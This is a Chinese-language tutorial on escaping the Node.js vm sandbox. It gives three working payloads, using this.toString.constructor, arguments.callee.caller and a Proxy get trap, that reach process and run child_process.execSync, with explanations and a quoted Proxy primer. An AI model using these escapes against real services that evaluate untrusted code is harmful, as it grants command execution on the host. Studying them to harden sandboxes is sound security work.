沙箱逃逸
0x01
const vm = require('vm'); //隔离环境
const script = `const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('ipconfig').toString()`;
const sandbox = { m: 1, n:2 };
const context = new vm.createContext(sandbox); //沙箱上下文环境
const res = vm.runInContext(script, context);
console.log(res)
沙箱的本质是内部环境能访问到外部变量,这里的this就是沙箱外的对象。
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('ipconfig').toString()
通过this来引入上下文没有的模块,this.toString.constructor指向Function函数,获取process模块,用来获得node进程相关的信息,比如运行node程序时的命令行参数。
成功执行代码
只要能在沙箱内部,找到一个沙箱外部的对象,借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱。
0x02
const vm = require('vm');
const script = `(() => {
const a = {}
a.toString = function () {
const cc = arguments.callee.caller; //拿到调用函数的方法,指向toString
const p = (cc.constructor('return process'))(); //cc.constructor 也就是Function
return p.mainModule.require('child_process').execSync('whoami').toString()
}
return a })()`;
const sandbox = Object.create(null);
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log('Hello ' + res)
Object.create(null) 是一个创建一个新对象的方法,该对象没有继承自任何原型链,所以this的值为null,如果在sandbox的上下文环境中用this来访问外部变量,将会是null
所以用到了arguments,通过‘arguments.callee.caller’获取函数调用者,也就是toString
console.log('Hello ’ + res) res和字符串连接会直接调用toString,触发a.toString = function ()这个方法
成功执行代码
如果外部代码没有拼接字符串:console.log( res) ,就需要利用proxy劫持外部的get
Proxy 可以理解成,在目标对象之前架设一层“拦截”,外界对该对象的访问,都必须先通过这层拦截,因此提供了一种机制,可以对外界的访问进行过滤和改写。Proxy 这个词的原意是代理,用在这里表示由它来“代理”某些操作,可以译为“代理器”。
var proxy = new Proxy({}, {
get: function(target, propKey) {
return 35;
}
});
proxy.time // 35
proxy.name // 35
proxy.title // 35
上面代码中,作为构造函数,Proxy接受两个参数。第一个参数是所要代理的目标对象(上例是一个空对象),即如果没有Proxy的介入,操作原来要访问的就是这个对象;第二个参数是一个配置对象,对于每一个被代理的操作,需要提供一个对应的处理函数,该函数将拦截对应的操作。比如,上面代码中,配置对象有一个get方法,用来拦截对目标对象属性的访问请求。get方法的两个参数分别是目标对象和所要访问的属性。可以看到,由于拦截函数总是返回35,所以访问任何属性都得到35。
——出自: https://www.bookstack.cn/read/es6-3rd/spilt.1.docs-proxy.md
const vm = require('vm');
const script = `(() => {
const a = new Proxy({}, {
get: function() {
const cc = arguments.callee.caller;
const p = (cc.constructor.constructor('return process'))();
return p.mainModule.require('child_process').execSync('whoami').toString()
}
})
return a })()`;
const sandbox = Object.create(null);
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res.xxx)
通过使用proxy,劫持get方法执行下列代码
const a = new Proxy({}, {
get: function() {
const cc = arguments.callee.caller;
const p = (cc.constructor.constructor('return process'))();
return p.mainModule.require('child_process').execSync('whoami').toString()
成功执行代码